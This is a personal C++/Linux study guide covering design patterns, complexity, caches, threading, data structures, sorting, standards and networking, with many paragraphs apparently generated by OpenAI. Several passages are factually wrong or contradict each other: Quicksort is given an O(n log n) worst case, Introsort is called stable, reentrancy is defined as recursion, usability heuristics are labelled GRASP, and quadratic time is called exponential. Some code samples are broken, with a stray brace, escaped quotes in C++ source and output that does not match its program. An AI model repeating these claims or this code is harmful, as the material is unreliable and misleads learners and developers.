Teach yourself C++ in 45 years

A Computer Science survival guide for C++/Linux developers

Dean Turpin

Thu Jun 8 04:07:40 UTC 2023

Forward

An ode to C++

Let’s start with a haiku written by a computer.

C++ code can solve
Complex problems with ease,
A powerful tool.

This reference is a distillation of 15+ years of online logbook notes into only the essentials that have continued to remain relevant as a senior software developer today. Just for fun – and where the topic is readily available or established – I have reached out to OpenAI to provide a paragraph or two. Consequently, the exact content and the chapter order will vary each night. Hopefully this will keep repeat visits interesting and also prevents me focusing all my attention on the first few chapters.

If time is tight, try the random daily chapter. And you can also raise a ticket on this repo.


Design patterns

Design Patterns are reusable solutions to commonly occurring software problems. They provide a way to structure code, making it more readable and maintainable. The objective of Design Patterns is to promote software development best practices and to provide efficient, reusable solutions to commonly occurring problems.

Categories

Common patterns

  1. Singleton Pattern
  2. Factory Pattern
  3. Strategy Pattern
  4. Observer Pattern
  5. Adapter Pattern
  6. Bridge Pattern
  7. Command Pattern
  8. Decorator Pattern
  9. Facade Pattern
  10. Proxy Pattern

Factory pattern

The Factory Design Pattern is a creational design pattern that allows for the creation of objects without exposing the logic required to create the objects. It involves providing an interface for creating objects and deferring the actual creation of the objects to subclasses. This allows for the creation of objects without having to know the specific details of the objects being created. The Factory pattern also allows for the creation of objects that may not exist at the time of the request, as the factory can determine which object needs to be created and then create it on demand.

Example of factory pattern

Store a system configuration in an external text file and construct at runtime using the factory pattern.

Visitor pattern

The visitor design pattern is a software design pattern that allows for the addition of new operations to a class without having to modify the original class. It uses a “visitor” object that can perform certain operations on the class. This is useful for cases where a class may have a variety of different operations that can be performed on it, but the class does not need to know how to perform them. The visitor object can be used to add new operations or modify existing ones. The visitor pattern is also useful when classes are in a hierarchy and the operations need to be performed on all the classes in the hierarchy.

Double dispatch

The visitor pattern exploits a feature of subtype polymorphism named “double dispatch.”

Double dispatch in subtype polymorphism is a form of dynamic dispatch where a method call is dispatched based on the runtime type of both the object on which the method is invoked and the argument passed to the method. This means that when a method is called in a class hierarchy, the particular method invoked is determined by the types of both the object and the argument. Double dispatch is useful when two objects of different types must interact with each other.

Example of visitor pattern

Create a class hierarchy of shapes and define methods that operate on those shapes in a visitor class.

Flyweight / singleton / memento

Hardware interface classes will typically be a const register map which is a flyweight pattern. This is also an example of a singleton pattern as it’s only initialised once regardless of how many instances are created. Additionally if registers are actually wired to discrete lines they might be read-only, so the memento pattern is used to store the internal state.

Reflection

“In computer science, reflection is the ability of a process to examine, introspect, and modify its own structure and behavior.”

See Wikipedia.

Dependency inversion

Dependency inversion is a principle in software development that states high-level modules should not depend on low-level modules. Instead, both should depend on abstractions. This allows for greater flexibility in the codebase and decouples modules from one another, making them easier to maintain and extend.


What are the most difficult concepts in computer science?

Binary structure

See Linux Debuginfo Formats - DWARF, ELF, dwo, dwp - What are They All? - Greg Law - CppCon 2022.

Section Description
stack / Local variables
heap /\ Dynamic memory
.rodata Read-only data
.bss Uninitialised data
.data Initialised data
.text Code

A binary executable is made up of a number of different segments. These segments contain the compiled code, data, and resources that are necessary for the executable to run. The segments typically include the following:

  1. Code Segment: This contains the program instructions that are executed when the program is run.

  2. Data Segment: This segment contains all the global and static variables that are used by the program.

  3. Stack Segment: This area of the executable is used to store local variables and function call parameters.

  4. Heap Segment: This segment is used to store dynamically allocated memory.

  5. BSS Segment: This segment is used to store uninitialized global and static variables.

  6. Resources Segment: This segment contains all of the resources (images, sounds, etc.) that are used by the program.

  7. Debug Segment: This segment is used to store debugging information that is used to track down errors. ___

The Software Development Life cycle (SDLC)

Waterfall versus agile

Construction of a building is often used to describe the software design process. But the analogy breaks down the building designer only has one attempt to compile the building. You can’t swap out the foundation halfway through.

Actually, in Royce’s later revisions of the model, he stated that the whole process should be done “twice if possible”.

Software validation versus verification

Validation is concerned with checking that the system will meet the customer’s actual needs. Verification will help to determine whether the software is of high quality, but it will not ensure that the system is useful.

Verification is objective (quality), validation is subjective (customer needs).

Validation is the process of checking whether the specification captures the customer’s needs, while verification is the process of checking that the software meets the specification.

See difference between verification and validation.

Waterfall sequence

RADCTDM

Advantages

Disadvantages

When should you use waterfall methodology?

Agile

BDD

What to call your test is easy – it’s a sentence describing the next behaviour in which you are interested. How much to test becomes moot – you can only describe so much behaviour in a single sentence. When a test fails, simply work through the process described above – either you introduced a bug, the behaviour moved, or the test is no longer relevant.

Resources

TDD

Test-driven development (TDD) is a software development process that relies on the repetition of a short development cycle: requirements are turned into specific test cases, then the software is improved to pass the new tests, only. This is opposed to software development that allows software to be added that is not proven to meet requirements.

As a [X] I want [Y] in order to [Z]

Title: Customer withdraws cash

Scenario 1: Account is in credit

Complexity

You should be comfortable explaining the complexity of your code. See the Big O Cheatsheet.

Complexity Class Description
O(1) Constant time complexity. The amount of time required to execute a process does not increase as the size of the input increases.
O(log n) Logarithmic time complexity. The amount of time required to execute a process increases logarithmically as the size of the input increases.
O(n) Linear time complexity. The amount of time required to execute a process increases linearly as the size of the input increases.
O(n log n) Log linear time complexity. The amount of time required to execute a process increases as the size of the input increases, but at a rate that is slower than linear.
O(n2) Quadratic time complexity. The amount of time required to execute a process increases exponentially as the size of the input increases.
O(n3) Cubic time complexity. The amount of time required to execute a process increases as a cube of the size of the input increases.
O(2n) Exponential time complexity. The amount of time required to execute a process increases exponentially as the size of the input increases.

Comparing two fundamental data structures

Linked lists typically have a worse average time complexity than arrays for most operations, such as accessing an element by its index. On average, linked lists have O(n) time complexity for these operations, while arrays have O(1) time complexity. Linked lists also tend to have better space complexity, as they only allocate the exact amount of memory needed to store their elements. Arrays, on the other hand, allocate a fixed amount of memory regardless of the number of elements they contain. ___

The rules of code

  1. A single file should contain fewer than 20000 lines of code
  2. It would be nice if a single routine could fit into 1000 lines of code
  3. Ensure comments are ignored by prefixing “todo”
  4. Use consistent formatting; even better, don’t bother and let clang-format do it
  5. Make everything constant, it’s much easier to reason about code when the data are immutable
  6. Unit testing is awesome and will almost certainly catch on

Unit testing

A test is not a unit test if:

See the complete article.


Caches

Processor caches are memory components that are built directly into the processor. They store frequently used data and instructions so that they can be accessed quickly. Caches are faster than main memory and typically operate at speeds closer to the processor clock speed. Caches are divided into levels, with the L1 cache being the fastest and smallest, and the L2 and L3 caches being larger but slower. The L2 and L3 caches are shared between multiple cores and may even be shared between multiple processors in a system.

Cache coherence

Cache coherence is a protocol that ensures multiple copies of the same data in different processor caches, or in the same processor cache, remain consistent. It is a feature of a distributed memory multiprocessor system that keeps multiple copies of shared data in different processor caches in synchronization. In other words, when one processor modifies a memory location, the caches of the other processors are updated in a timely fashion. This protocol helps to prevent data inconsistency when multiple processors access and modify the same data.

Cache misses

There are three kinds of cache misses:

  1. Instruction read miss
  2. Data read miss
  3. Data write miss

Cache misses occur when a requested item is not found in the cache. This happens when the requested item is either not stored in the cache or has been removed. When this happens, the processor must access the main memory to retrieve the requested item, which causes a significant performance penalty.

Data cache

Instruction cache

Virtual functions

The way virtual functions work may cause issues with caching.

  1. Load vtable pointer: potentially data cache miss
  2. Load virtual function pointer: potentially data cache miss
  3. Then code of function is called: potential instruction cache miss

But we may be able to use CRTP to avoid the first two.

Cache oblivious algorithm design

Typically a cache-oblivious algorithm works by a recursive divide and conquer algorithm, where the problem is divided into smaller and smaller sub-problems. Eventually, one reaches a sub-problem size that fits into cache, regardless of the cache size.

Data-oriented design

Design to get the most value out of every single cacheline that is read. Split apart the functions and data.

Cache locality

Cache locality is a concept related to computer memory and processor performance. It refers to the ability of a processor to access data from its cache memory instead of from main memory. When data is stored in the cache memory, it can be retrieved more quickly and efficiently than when it is stored in main memory. The closer the data is to the processor, the more likely the processor will be able to access it. This is referred to as temporal locality (or data locality), which is when the processor accesses data that has been recently used. Spatial locality (or instruction locality) is when the processor accesses data that is stored close to the recently used data. By using cache memory, the processor can access data more quickly and efficiently, resulting in improved performance.

Further reading


Multithreading

Multithreaded concepts are important: e.g., atomics, locks, issues with different designs, how to make things thread safe.

Why use multithreading? For performance and/or separation of concerns.

Reentrancy

tl;dr “A computer program or subroutine is called reentrant if multiple invocations can safely run concurrently on a single processor system.”

Reentrancy is a programming concept that allows a function or procedure to call itself. This can be useful for recursive data structures, where the same set of instructions needs to be applied multiple times in order to process the data. It can also be used to create loops in code, allowing for code to repeat itself until a certain condition is met.

Race conditions

tl;dr “Race condition: an unfortunate order of execution causes undesirable behaviour.”

Race conditions occur in computer science when two or more processes access and try to modify the same data at the same time. The result of the operation will depend on which process gets to the data first. This can lead to unpredictable results and errors in the program. In some cases, these errors can be difficult to reproduce and diagnose.

Invariants

A good way to reason about your code is to consider the invariants that must be true at any given point in time. If you are deleting an element from a linked list, you must control access to the list whilst you are updating the previous and next pointers.

Invariants are properties of a system that remain unchanged throughout its operation. In software engineering, invariants are often used to ensure the correctness of a system by guaranteeing that certain conditions remain true at all times. This can be achieved through testing, design, or coding. Invariants can also be used to describe the system’s state or its behavior.

Considerations

Deadlocks and livelocks

Deadlocks and livelocks are both types of concurrency problems.

A deadlock is a situation in which two or more competing actions are each waiting for the other to finish, and thus neither ever does. This can occur when multiple processes request the same resources at the same time and the resources are not released until all of the processes have finished.

A livelock is similar to a deadlock, except that the states of the processes involved in the livelock constantly change with regard to one another, none progressing. Livelocks are a kind of resource starvation, in which a process is unable to acquire a resource it needs because another process is constantly using and releasing it.

Avoiding deadlocks

Run your code on different numbers of CPUs. It’s interesting how the bottlenecks move around depending on the available resources; and it’s really easy to write software that doesn’t run on one core.

The most effective way to avoid deadlocks is to use an algorithm that prevents them from occurring in the first place. This includes techniques such as lock ordering, lock timeouts, and lock escalation. Additionally, it is also important to design applications to minimize the possibility of deadlocks occurring. This includes ensuring that locks are always released in the same order they were acquired, keeping transactions short and simple, and minimizing the number of resources a transaction needs to access.

See also

Additionally

Synchronising threads

A mutex is a type of lock that is used to control access to a shared resource. It is a synchronization mechanism that allows only one thread or process to access a shared resource at a time.

A semaphore is a type of lock that is used to control access to multiple shared resources. It is a synchronization mechanism that allows multiple threads or processes to access multiple shared resources at a given time. Unlike a mutex, a semaphore can have multiple holders. Semaphores can also be used to limit the number of threads or processes that can access a shared resource at a given time.

See Mutex vs Semaphore

Threads versus processes

tl;dr A thread is a branch of execution. A process can consist of multiple threads.

Threads and processes are both used to run programs on a computer. However, threads and processes differ in several ways.

Threads are a subset of processes that are spawned by a process and that share the same memory and resources. Threads are lightweight and can run independently of each other, making them more efficient for multitasking.

Processes, on the other hand, are completely independent of each other and have their own memory and resources. They can run concurrently, but do not share memory or resources. Processes are more resource-intensive and require more overhead than threads.

Thread bests practice

References


Data structures

It’s important to know the common data structures and their characteristics.

  1. Arrays
  2. Linked Lists
  3. Stacks
  4. Queues
  5. Trees
  6. Graphs
  7. Hash Tables
  8. Heaps

std::vector

std::vector is the go-to container, so let’s give it some special attention. It has contiguous storage – therefore cache friendly – and uses the RAII paradigm: the data are created on the heap and the allocation and deallocation (new/delete) are handled for you. Interestingly, std::string exhibits many of the same characteristics, but it’s not quite containery enough to qualify.

How does my vector grow?

Estimate how many times the fax destructor is called below.

#include <iostream>
#include <vector>

auto x = 0uz;

int main() {
    struct fax {
        // Default constructor and destructor
        fax() { std::cout << x << " ctor\n"; }
        ~fax() { std::cout << "\t" << x << " dtor\n"; }

        // Copy constructors
        fax(const fax&) { std::cout << x << " copy ctor\n"; };
        fax(fax&&) { std::cout << x << " move ctor\n"; };

        // Assignment constructors
        fax& operator=(const fax&) {
            std::cout << x << " copy assignment ctor\n";
            return *this;
        }
        fax& operator=(fax&&) {
            std::cout << x << " move assignment ctor\n";
            return *this;
        };

        const size_t id = x++;
    };

    std::vector<fax> y;

    // Reduce copies by allocating up front
    // y.reserve(3);

    for (size_t i = 0; i < 3; ++i) {
        y.push_back(fax{});
    std::cout << "-- capacity " << y.capacity() << " --\n";
    }

    // fax f1 = fax{};
    // fax f2 = std::move(fax{});
}
}

See the program output (below), note how the capacity is growing exponentially (doubling each time).

1 ctor
2 move ctor
    2 dtor
-- capacity 1 --
3 ctor
4 move ctor
5 copy ctor
    5 dtor
    5 dtor
-- capacity 2 --
6 ctor
7 move ctor
8 copy ctor
9 copy ctor
    9 dtor
    9 dtor
    9 dtor
-- capacity 4 --
    9 dtor
    9 dtor
    9 dtor

For each push we call the default constructor to create a temporary object and then call the copy constructor to populate the new element with its data… so far so good. But crucially, when the vector is resized we must also copy all the existing elements into the new container. Not an issue for this simple case, but if the class is expensive to copy there could be trouble ahead. Additionally, if there’s a bug in the copy constructor, we may be corrupting existing valid data simply by copying it around.

Binary search trees

Binary search trees have an amortized complexity of O(log n) unless the tree is unbalanced. Worst case, if the tree is unbalanced, then it is O(n). std::set and std::map are implemented using a red-black tree, a type of balanced binary search tree. C++23 introduces std::flat_map which is implemented using contiguous storage to make it more cache-friendly.

Binary search trees (BSTs) are a type of data structure that stores data in a tree-like structure. In a BST, each node has two children (left and right) and the data within each node is organized in such a way that all data in the left subtree of a node is less than the node’s data, and all data in the right subtree of the node is greater than the node’s data. This makes BSTs an efficient way to search for data, as the algorithm for searching for data in a BST is much more efficient than a linear search.

Self-balancing binary search trees

A balanced tree is one of height O(log n), where n is the number of nodes in the tree. It is a sorted hierarchy of data where the left most node is the smallest, and the right most node is the largest.

Below each node of a binary search tree is a mini tree. The top of the tree is the middle element.

e|            /e          
d|           d            
c|          / \c          
b|         b              
a|        / \ /a          
9|-----  /   9            
8|      /     \8          
7|     7                  
6|      \     /6          
5|-----  \   5            
4|        \ / \4          
3|         3              
2|          \ /2          
1|           1            
0|            \0          

Hash tables

Hash tables have an amortized complexity of O(1) unless there are collisions. Worst case, if everything is in the same bin, then it is O(n). Additionally, if the proportion of slots – known as “load factor” or “fill ratio” – exceeds a threshold, then the hash table must be resized/rebuilt.

std::unordered_set and std::unordered_map are implemented using hash tables.

Heaps

A heap is a useful data structure when it is necessary to repeatedly remove the object with the highest (or lowest) priority.

Support of random access iterators is required to keep a heap structure internally at all times. A min heap is also a sorted list.

123456789abcedef
1
23
4567
89abcdef

Project down, the top of the tree is a smallest element.

       1
   2       3
 4   5   6   7  
8 9 a b c d e f
       1
      / \   
     /   \  
    /     \ 
   2       3
  / \     / \
 4   5   6   7  
/ \ / \ / \ / \
8 9 a b c d e f

Comparison of heaps and binary search trees

A heap is a tree-based data structure in which the nodes are arranged in a hierarchical structure such that the parent node is always greater than or equal to its children. It is a type of priority queue that can be used to efficiently implement a priority queue of elements.

A binary search tree is a data structure that consists of nodes arranged in a particular order. In a binary search tree, the left child node must be less than the parent node, and the right child node must be greater than the parent node. This structure allows for efficient searching of data by allowing the user to quickly locate a particular node in the tree.

Singly linked lists

Adding/removing at the beginning is O(1), but adding at the end means search the whole list, therefore O(n). Searching is also O(n).

std::forward_list is a singly linked list.

Doubly linked lists

Like a singly linked list but we can iterate both ways. It stores a pointer to both the beginning and end, therefore operations on the end are also O(1).

std::list is a doubly linked list.

C++ Standard Library container complexities

Container Access Search Insertion Deletion
vector O(1) O(n) O(1) O(n)
deque O(1) O(n) O(1) O(n)
list O(n) O(n) O(1) O(1)
forward_list O(n) O(n) O(1) O(1)
array O(1) O(n) - -
map O(log n) O(log n) O(log n) O(log n)
set O(log n) O(log n) O(log n) O(log n)
unordered_map O(1) O(1) O(1) O(1)
unordered_set O(1) O(1) O(1) O(1)

However, the conventional CS wisdom for when to use a linked list over contiguous storage hasn’t applied for years: you have to measure. E.g., if a container fits in the cache, a vector might outperform everything.


C++ standards

Features of note since C++11.

C++23

From the presentation by Marc Gregoire (CppCon 2022).

Not implemented yet

Not supported in gcc 12.2.

Ranges and views (part two)

A lot of effort has gone into ranges and views C++23.

std::ranges

std::views

C++20

C++17

Also see cppreference.

C++14

C++14 is an extension and improvement of C++11.

C++11


Move semantics

This a large, complicated topic. See C++ Move Semantics - The Complete Guide by Nicolai M. Josuttis.


Object-oriented programming

Object-oriented programming (OOP) is a programming paradigm that uses objects, or data structures, to store and manipulate data. OOP is used to create programs that are more organized, maintainable, and efficient than traditional procedural programming. OOP focuses on objects rather than actions and data rather than logic. It uses encapsulation, inheritance, and polymorphism to create programs that are easier to maintain and extend. OOP also encourages the use of abstraction, making programs easier to understand and debug.

Polymorphism

  1. Ad-hoc polymorphism (or overloading): This type of polymorphism is when the same operation can be used with different types of data. For example, a "+" can be used to add two numbers or to concatenate two strings.

  2. Parametric polymorphism (or generics): This type of polymorphism is when the same code can be used with different types of data. For example, a generic function can be used to sort different types of data, such as integers, strings, and objects.

  3. Subtype polymorphism (or inheritance): This type of polymorphism is when a subclass can be used in place of its parent class. For example, a subclass of Animal can be used in place of the Animal class.

  4. Coercion polymorphism (or conversion): This type of polymorphism is when a value of one type can be converted into another type. For example, an integer can be converted to a floating-point number.

Virtual destructors

A standard question at interviews! A very nuanced feature of OOP in C++ but you can now test this at compile time with type traits.

Destructors must be declared virtual when the class contains virtual functions or is part of a polymorphic hierarchy. This ensures that the destructor of a derived class is called if it is deleted via a pointer to the polymorphic base class.

Virtual function specifier

The virtual specifier specifies that a non-static member function is virtual and supports dynamic dispatch. It may only appear in the decl-specifier-seq of the initial declaration of a non-static member function (i.e., when it is declared in the class definition).

In derived classes, you should mark overridden methods as override to express intention and also protect from the base class being changed unwittingly.

Virtual tables

A non-virtual class has a size of 1 because in C++ classes can’t have zero size (objects declared consecutively can’t have the same address.)

A virtual class has a size of 8 on a 64-bit machine because there’s a hidden pointer inside it pointing to a vtable. vtables are static translation tables, created for each virtual-class.

RAII

RAII stands for “Resource Acquisition Is Initialization.” It is a programming technique that utilizes the scope of objects to help manage and control the lifetime of resources such as memory, files, network connections, and locks. RAII works by acquiring resources when an object is created, and releasing them when the object is destroyed. This ensures that resources are managed properly, and that resources are released in a timely manner when they are no longer needed. RAII is used in many programming languages, including C++, Java, and C#. ___

OpenAI generated interview questions

  1. What is your experience with developing software?

  2. What is your experience with debugging code?

  3. How do you handle dealing with conflicting requirements?

  4. How do you ensure code quality?

  5. How do you stay up-to-date with the latest technology?

  6. What is the difference between a reference and a pointer?

  7. What is the difference between a class and a struct in C++?

  8. Explain the concept of polymorphism in C++.

  9. What is the difference between an inline function and a normal function in C++?

  10. What is the purpose of the ‘this’ pointer in C++?


C++ function parameters

For simple readonly types, pass by const value.

void func(const int p) {
}

For large readonly types – i.e., larger than a pointer – pass by const reference. You should also consider if the type is trivially copyable: requiring a shallow or deep copy.

void func(const big_type& p) {
}

If the first thing you do is make a copy, pass by non-const value.

void func(int p) {
}

If you want to modify the caller’s copy, pass by non-const reference.

void func(int& p) {
}

class or struct?

The only difference between a class and a struct is the default access level: public, protected, private.

But typically a struct is used for “plain old data” or memory-mapped data where you don’t want the members to align in a predictable way (virtuals/inheritance adds the complication of a vtable pointer.)

Either way, you can test your assertions at compile time with static_assert and the type traits header.

struct A {
  // public: <-- default for structs
  int x_;
};

If the data are constrained by an invariant – i.e., not all values are valid – use a class.

class B {
  private: // <-- default for classes
  int x_; // must be between 0-1000
};

C++ linkage

Internal linkage: Variables and functions with internal linkage can only be seen and used within the same translation unit (file). The keywords static and extern can be used to specify a variable or function’s linkage. Variables and functions with static keyword have internal linkage.

External linkage: Variables and functions with external linkage can be seen and used by multiple translation units (files). The keyword extern can be used to specify a variable or function’s linkage. Variables and functions with extern keyword have external linkage.

Dependencies on static variables in different translation units are, in general, a code smell and should be a reason for refactoring.

http://www.modernescpp.com/index.php/c-20-static-initialization-order-fiasco

If an object or function inside such a translation unit has internal linkage, then that specific symbol is only visible to the linker within that translation unit. If an object or function has external linkage, the linker can also see it when processing other translation units. The static keyword, when used in the global namespace, forces a symbol to have internal linkage. The extern keyword results in a symbol having external linkage.

Anonymous namepsaces

Used to declare many things with internal linkage.

namespace {
  int a = 0;
  int b = 0;
  int c = 0;
}

Algorithms

The Jonathan Boccara CppCon 105 STL Algorithms in Less Than an Hour is well worth a watch for a quick overview.

Sorting

Quicksort is the poster boy of sorting algorithms.

The time complexity of Quicksort is O(n log n) in the best, average, and worst cases. This is because the algorithm divides the input array into two subarrays and recursively sorts them. The complexity is determined by the number of recursive calls which is proportional to the logarithm of the input size.

Below is a Python implementation just for fun. But how is it implemented in C++?

def quicksort(array):
    less = []
    equal = []
    greater = []

    if len(array) > 1:
        pivot = array[0]
        for x in array:
            if x < pivot:
                less.append(x)
            if x == pivot:
                equal.append(x)
            if x > pivot:
                greater.append(x)
        # Don't forget to return something!
        return quicksort(less)+equal+quicksort(greater)  # Just use the + operator to join lists
    # Note that you want equal ^^^^^ not pivot
    else:  # You need to handle the part at the end of the recursion - when you only have one element in your array, just return the array.
        return array

std::sort uses Introsort

Introsort is a hybrid sorting algorithm used to sort arrays. It combines the features of both Quicksort and Heapsort, and is the algorithm of choice for the C++ standard library. It begins with an ordinary Quicksort, but when the recursion level gets too deep, it switches to Heapsort for better performance. Introsort has several advantages over other sorting algorithms, including being more efficient, stable, and requiring fewer comparisons. It is also faster than traditional Quicksort in cases where the array is already partially sorted.

Introsort is in place but not stable: i.e., equivalent elements are not guaranteed to remain in the same order. However, the Standard Library offers stable_ versions of various sorting algorithms.

If additional memory is available, stable_sort remains O(n ∗ logn). However, if it fails to allocate, it will degrade to an O(n ∗ logn ∗ logn) algorithm.

https://leanpub.com/cpp-algorithms-guide

Small array threshold

The threshold for switching to insertion sort varies for each compiler.

std::list

std::sort requires random access to the elements, so std::list has its own sort method, but it still (approximately) conforms to O(n log n). It can be implemented with merge sort as moving elements is cheap with a linked list.

Other sorting algorithms

Considerations for choosing an algorithm: size of input, Type of input: e.g., partially sorted, random.

The complexity of sorting algorithms depends on the algorithm used, the size of the input, and the order of the elements being sorted.

Bubble Sort: Bubble Sort is a simple sorting algorithm with a time complexity of O(n^2). This means that the time complexity of Bubble Sort increases quadratically with the size of the input.

Merge Sort: Merge Sort is a divide and conquer algorithm with a time complexity of O(nlogn). This means that the time complexity of Merge Sort increases logarithmically with the size of the input.

Quick Sort: Quick Sort is a divide and conquer algorithm with a time complexity of O(nlogn). This means that the time complexity of Quick Sort increases logarithmically with the size of the input.

Heap Sort: Heap Sort is a comparison-based sorting algorithm with a time complexity of O(nlogn). This means that the time complexity of Heap Sort increases logarithmically with the size of the input.

Insertion Sort: Insertion Sort is a simple sorting algorithm with a time complexity of O(n^2). This means that the time complexity of Insertion Sort increases quadratically with the size of the input.

Selection Sort: Selection Sort is a simple sorting algorithm with a time complexity of O(n^2). This means that the time complexity of Selection Sort increases quadratically with the size of the input.

All of these are Θ(n log n) in all cases apart from Timsort has a Ω(n) and Quicksort has a terrible O(n^2) (if we happen to always pick the worst pivot). Quicksort is a good all rounder with O(n log n) average case. But it does have a O(n^2) worst case. It is said that this can be avoided by picking the pivot carefully but an example could be constructed where the chosen pivot is always the worst case.

References

Parallelism

Typically parallelism makes you think “threads within a process” but it’s worth considering different points in the processing that could be executed/calculated in parallel.

Kinds of parallelism

The iron law of performance!

See wikipedia.

time/program = instructions/program * clockCycles/instruction * time/clockCycles

Amdahl’s law

Amdahl’s law, named after computer scientist Gene Amdahl, is a principle that states the theoretical speedup of a program using multiple processors in parallel computing relative to using a single processor can never exceed a certain limit, no matter how many processors are used. This limit is determined by the fraction of the program which must be executed sequentially. The law is used to predict the theoretical maximum speedup when using multiple processors for a particular task.

It’s very easy to optimise the bits your are familiar with but not obvious how much your efforts will benefit the overall process: spend your time on the bottlenecks.

The C++ Standard Library containers

The C++ Standard Library containers provide a convenient and efficient way to store and manage data. They are designed to be reliable and efficient, and offer a wide range of features such as sorting, searching, and iterating through the data they contain. They also provide excellent support for memory management, which is important for programs that use large amounts of data. In addition, the containers are highly portable, so code written using them can be easily adapted to different platforms and compilers.

  1. vector
  2. deque
  3. list
  4. forward_list
  5. array
  6. stack
  7. queue
  8. priority_queue
  9. set
  10. multiset
  11. map
  12. multimap
  13. unordered_set
  14. unordered_multiset
  15. unordered_map
  16. unordered_multimap

Categories of containers

Sequence containers are data structures that store elements in a specific order. They are also known as linear data structures because their items are arranged in a linear fashion. Examples of sequence containers include arrays, vectors, and linked lists.

Associative containers are data structures that store elements in no particular order. They are also known as non-linear data structures because their items are not arranged in a linear fashion. Examples of associative containers include maps, sets, and hash tables.

Choosing a container

Networking

“Please Do Not Take Salami Pizza Away”

See OSI on Wikipedia.

Layer Function
Layer 1 Physical
Layer 2 Data Link
Layer 3 Network
Layer 4 Transport
Layer 5 Session
Layer 6 Presentation
Layer 7 Application

Three way handshake

The TCP three-way handshake is a process used in a TCP/IP network to establish a connection between a client and a server. It is a three-step process that involves the client sending a SYN packet, the server responding with a SYN/ACK packet, and the client sending an ACK packet back to the server to confirm the connection. The three-way handshake process helps to synchronize the two devices involved in the connection and ensures that they are both ready to begin sending and receiving data.

SYN stands for “synchronise”.

=> SYN
<= SYN-ACK
=> ACK
=> HTTP (request)
<= ACK
<= HTTP (response)
=> ACK
=> FIN
<= FIN-ACK
=> ACK

SOLID

  1. Single Responsibility Principle (SRP)
  2. Open/Closed Principle (OCP)
  3. Liskov Substitution Principle (LSP)
  4. Interface Segregation Principle (ISP)
  5. Dependency Inversion Principle (DIP)

GRASP

Less common but another set of principles to consider.

  1. Balance User and System Objectives: Design interfaces that meet the needs of both users and the system as a whole.

  2. Visibility of System Status: Keep users informed of system status and provide feedback on their actions.

  3. Match Between System and Real World: Design interfaces that use language, terms, and concepts familiar to users.

  4. User Control and Freedom: Allow users to easily undo or redo their actions, and provide them with a clear way to exit the system.

  5. Consistency and Standards: Use consistent language, design, and navigation throughout the system.

  6. Error Prevention: Anticipate user mistakes and design to prevent them.

  7. Recognition Rather than Recall: Design interfaces that allow users to recognize options rather than forcing them to recall them.

  8. Flexibility and Efficiency of Use: Design interfaces that accommodate both novice and experienced users.

  9. Aesthetic and Minimalist Design: Keep interfaces simple and uncluttered.

  10. Help and Documentation: Provide users with easy access to help and documentation. ___

The magnitude of it all

In 2014 Randall Munroe estimated that Google stores 10 exabytes of data across all of its operations. However, as a C++ developer, you will only come across at most petabytes of storage; and if CPUs are topping out at gigahertz, then you won’t see anything much faster than a nanosecond.

                        1 000  kilo | milli .001
                    1 000 000  mega | micro .000 001
                1 000 000 000  giga | nano  .000 000 001
            1 000 000 000 000  tera | pico  .000 000 000 001
        1 000 000 000 000 000  peta | femto .000 000 000 000 001
    1 000 000 000 000 000 000   exa | atto  .000 000 000 000 000 001
1 000 000 000 000 000 000 000 zetta | zepto .000 000 000 000 000 000 001

See list of SI prefixes.

You may be tempted to use binary prefixes to be more precise – kibi, mebi, gibi, etc – but most people won’t know what you’re talking about. Also, manufacturers tend to use 10003 rather than 220 because it makes their performance look better.

Important speeds you should be aware of

See why is everyone in such a rush?

1/1000000000 second == 1 nanosecond 

Approximate durations of typical operations (rounded to help remember.)

Action Duration (nanoseconds)
L1 cache read, variable increment <1
Branch misprediction (how do you measure this?) 5
L2 cache read, std::atomic 10
std::mutex/scoped_lock 20
Fetch from main memory 100
Semaphore acquire 200
Send 2KiB over 1Gbps network 20,000
Create a std::thread 20,000
Send packet from US to Europe and back 200,000,000

Hash functions

A hash function is a mathematical algorithm that takes an input of any size and generates a fixed-size output called a hash. The purpose of a hash function is to ensure the integrity of data by creating a unique value for each piece of data that cannot be reversed. Hashes are used widely in cryptography, digital signatures, and data protection.

Properties of a hashing algorithm

String hashing

Creating threads in C++

This is all a lot easier since std::thread was introduced in C++11. Now we have a platform dependent interface.

See the C++ concurrency support library examples.

However, remember there is an overhead in creating a thread: if the operation you’re repeating is quick then could it actually take longer to parallelise it? You need to profile: how long does it take to just create a thread?

Ways to create a thread

std::async

Think of it like pushing a calculation into the background. std::async executes a function asynchronously and returns a std::future that will eventually hold the result of that function call. Quite a nice way to reference the result of calculation executed in another thread.

std::thread

You need to call join() for every thread created with std::thread. Typically it’s done by storing your threads as a vector and joining each of them in a loop.

std::jthread

Like a regular thread but you don’t have to join it in the caller: it actually joins for you in the destructor. Quite nice to not have to remember to join, but joining all your threads can be a convenient synchronisation point.

Execution policies

Many of the Standard Library algorithms can take an execution policy, which is quite an exciting way to parallelise existing code. But remember it offers no protection of shared data: it’s still just a bunch of threads.

C++ algorithms that can take an execution policy

Some of these have an _if version that takes a additional predicate: e.g., std::replace and std::replace_if.

  1. std::sort
  2. std::copy
  3. std::transform
  4. std::accumulate
  5. std::for_each
  6. std::reduce
  7. std::inclusive_scan
  8. std::exclusive_scan
  9. std::transform_reduce
  10. std::remove
  11. std::count
  12. std::max_element
  13. std::min_element
  14. std::find
  15. std::generate

Acquiring resources

std::mutex

A standard way to protect access to something, but there are multiple ways to unlock it.

Acquiring multiple resources

Here be dragons! In the shape of deadlocks. There are several strategies to improve your chances of not become stuck, see the deadlock chapter for more.

You can use std::scoped_lock with multiple resources or single, but I think they express intention better, by virtue of having “scope” in the name.

Standard library threading types

See the Standard Library concurrency support library.

Let’s ask OpenAI to write a producer-consumer solution in C++

#include <iostream>
#include <thread>
#include <mutex>
#include <condition_variable>
#include <queue>

std::mutex m;
std::condition_variable cv;
std::queue<int> q;

void producer()
{
    for (int i = 0; i < 10; i++) {
        std::unique_lock<std::mutex> lck(m);
        q.push(i);
        std::cout << \"Produced: \" << i << std::endl;
        lck.unlock();
        cv.notify_one();
    }
}

void consumer()
{
    while (true) {
        std::unique_lock<std::mutex> lck(m);
        while (q.empty()) {
            cv.wait(lck);
        }
        int val = q.front();
        q.pop();
        lck.unlock();
        std::cout << \"Consumed: \" << val << std::endl;
        if (val == 9)
            break;
    }
}

int main()
{
    std::thread t1(producer);
    std::thread t2(consumer);
    t1.join();
    t2.join();
    return 0;
}

Template metaprogramming

“Generic programming is why we can’t have nice things” – Andrei Alexandrescu

